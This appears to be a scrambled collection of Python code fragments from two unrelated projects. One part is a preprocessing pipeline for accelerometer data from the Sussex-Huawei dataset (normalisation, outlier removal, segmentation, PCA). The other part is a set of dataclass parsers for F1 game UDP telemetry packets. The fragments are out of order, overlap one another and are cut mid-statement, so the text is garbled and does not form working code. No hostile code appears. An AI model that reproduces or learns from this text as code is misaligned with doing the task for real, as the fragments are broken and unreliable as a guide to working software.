pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': #", "for ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove", "exact_length = args[2] segments_aggregated = [] split = lambda df, chunk_size : numpy.array_split(df,", "== 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if", "semantic segementation of a fixed interval. :param data: :param mode: :param label_column: :param", "return data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length", "None or mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "std = None): \"\"\" Apply z-normalization to a data set. :param data: :param", "if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data,", "\"\"\" try: if data is None or replacement_mode is None or unwanted_labels is", "None and std is None: if columns is not None: mean = data[columns].mean()", "\"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise", "data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns,", "self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data = self.label_data(data, labels) data =", "pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time", "axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data", "numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None):", "car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment)", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str):", "= data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else: mean = data.mean()", "#acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label']", "data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for", "dimensionality reduction technique to a data set. :param data: :param mode: :param reduced_column_name:", "data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "= pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group", "pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index =", "@overrides def label_data(self, labels, data): \"\"\" Combines labels vector and data matrix. :param", "series based on a label column, semantic segementation of a fixed interval. :param", "data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data,", "print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data =", "#Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment", "replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode,", "axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs'", "data.min()) / (data.max() - data.min()) # to center around 0.0 substract 0.5 return", "[] split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1,", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except", "segment_length = args[0] aggregate = args[1] exact_length = args[2] segments_aggregated = [] split", "data, freq, mode = None): \"\"\" Resamples quantitative data. :param data: :param freq:", "replacement_value: any type, used as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\"", "if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise", "isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'],", "label_column=None, args=None): \"\"\" Segements a time series based on a label column, semantic", "TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data", "def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data set. :param data:", "not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if", "not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode", "data_test_segments = [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels", "os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time", "encoding_function: :return: \"\"\" try: if data is None or mode is None or", "not isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode ==", "None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not", ":param data: :param mode: :param label_column: :param args: :return: \"\"\" try: if data", "mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns,", "= meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data", "or target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "Fresh )[:-1] return data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply all", "reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data,", "acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1,", "= pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data", "= data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode ==", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind,", "replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is None or replacement_mode", "data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile',", "data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind]", "1. Ensure index is datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2.", "= pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are too long or too", "data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None,", "long or too short after splitting min_length_subsegements = [] for segment in segments:", "= pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "== 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind", "os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data set.", "= self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run", ":param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is None", "if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column", "print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments =", "[] for target_label in args: selected_data = data[data[label_column] == target_label] # 2. Split", "os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None):", "None: mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns] - data[columns].mean()) /", "all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None", "mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError,", "substract 0.5 else: data = (data - data.min()) / (data.max() - data.min()) #", "# current run @0.95 for classical approach via TS Fresh )[:-1] return data", "and aggregate data segments_combined = None for segment in min_length_subsegements: segment = segment.reset_index()", "isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError,", "reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'pca':", "= config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0],", "is None or target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None:", "if mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column", "data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind],", "isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise", "data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column]", "args[2] segments_aggregated = [] split = lambda df, chunk_size : numpy.array_split(df, len(df) //", "or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels,", "test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y',", "'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError,", "(data - data.min()) / (data.max() - data.min()) # to center around 0.0 substract", "replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len = int(data_len * test_sz)", ":param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as value", "config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq']", "mean = None, std = None): \"\"\" Apply z-normalization to a data set.", "pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] =", "= self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid", "else: data = (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data,", "len(df) // chunk_size + 1, axis=0) # 1. Ensure index is datetime index", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "#Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality", "0.0 substract 0.5 else: data = (data - data.min()) / (data.max() - data.min())", "#Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) #", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels", ":param threshold: :return: \"\"\" try: if data is None or replacement_mode is None", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data,", "\"\"\" try: if data is None or mode is None or columns is", "for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self,", "= self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs'", "mode: :param columns: :param encoding_function: :return: \"\"\" try: if data is None or", "data, column, unit): \"\"\" Converts unix time stamps to date time. :param data:", "road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] =", "pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined = None for segment", "segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined = None", "unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit =", "2. Split by non-subsequent indices # Source for next 3 lines after comment:", "data.set_index(old_index) return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError," ]
[ "struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active car", "allocate to position on car (fl, fr, rl, rr). Args: telemetry_values(list): List of", "m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls,", "m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary", "PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object,", "unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove header", "List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked (list): Unpacked struct containing", "\"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class", "car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values", "-> dict: \"\"\"Get single attributes from attributes list and allocate to position on", "struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6],", "all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3],", "binary_message: str): \"\"\"Create class form binary UDP package. Args: binary_message (str): Binary representation", "str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader:", ") @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header:", "attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15],", "| _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from", "m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature:", "representation of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return", "data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy()", "( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values from list to", "CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8", "cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create class form", "m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into", "player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to attributes player_telemetry_message = (", "struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22),", "LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player", "i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] =", "package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0],", "pressure values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"],", "unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index =", "\"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\"", "data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1) * len(message_format)", "m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes.", "+ 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2],", "-> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index]", "@classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package. Args: binary_message", "# Map tyre temperature values from list to attributes player_telemetry_message = ( player_telemetry_message", "player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre", "CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]),", "unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\"", "unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData:", "\"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ |", "{} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i]", "m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List):", "from dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT", "unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes:", "data_list = list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i *", "| _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values", "for car telemetry. Classes parse data from binary format and extract player data.\"\"\"", "temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"],", "\"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def", "ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct", "m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List):", "range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1) *", "len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def", "unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData]", "ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16]", "* len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls(", "_telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes from attributes list and", "m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls,", "PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header,", "* len(message_format) : (i + 1) * len(message_format) ] ) data_list.append(data) return data_list", "list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]),", "\"\"\"Parse unpacked struct into class attributes. Args: unpacked (list): Unpacked struct containing all", "_telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list", "Map tyre damage values from list to attributes player_car_damage_message = ( player_car_damage_message |", "each active car car_telemetry_data_list = list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked(", "str): \"\"\"Create class form binary UDP package. Args: binary_message (str): Binary representation of", "CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass", "mapped to attributes. attribute_name(str): Attribute name used as keys in dict. \"\"\" car_position_mapping", "unpacked struct into class attributes. Args: unpacked (list): Unpacked struct containing all attributes", "struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str,", "to construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5],", "player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", ) ) player_car_damage_message.pop(\"m_brakesDamage\") return player_car_damage_message", "(str): Binary representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string,", "List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args:", "message_type: object, ): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader", "unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked (list): Unpacked struct", "PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header,", "lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index", "unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data for each active car", "car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, 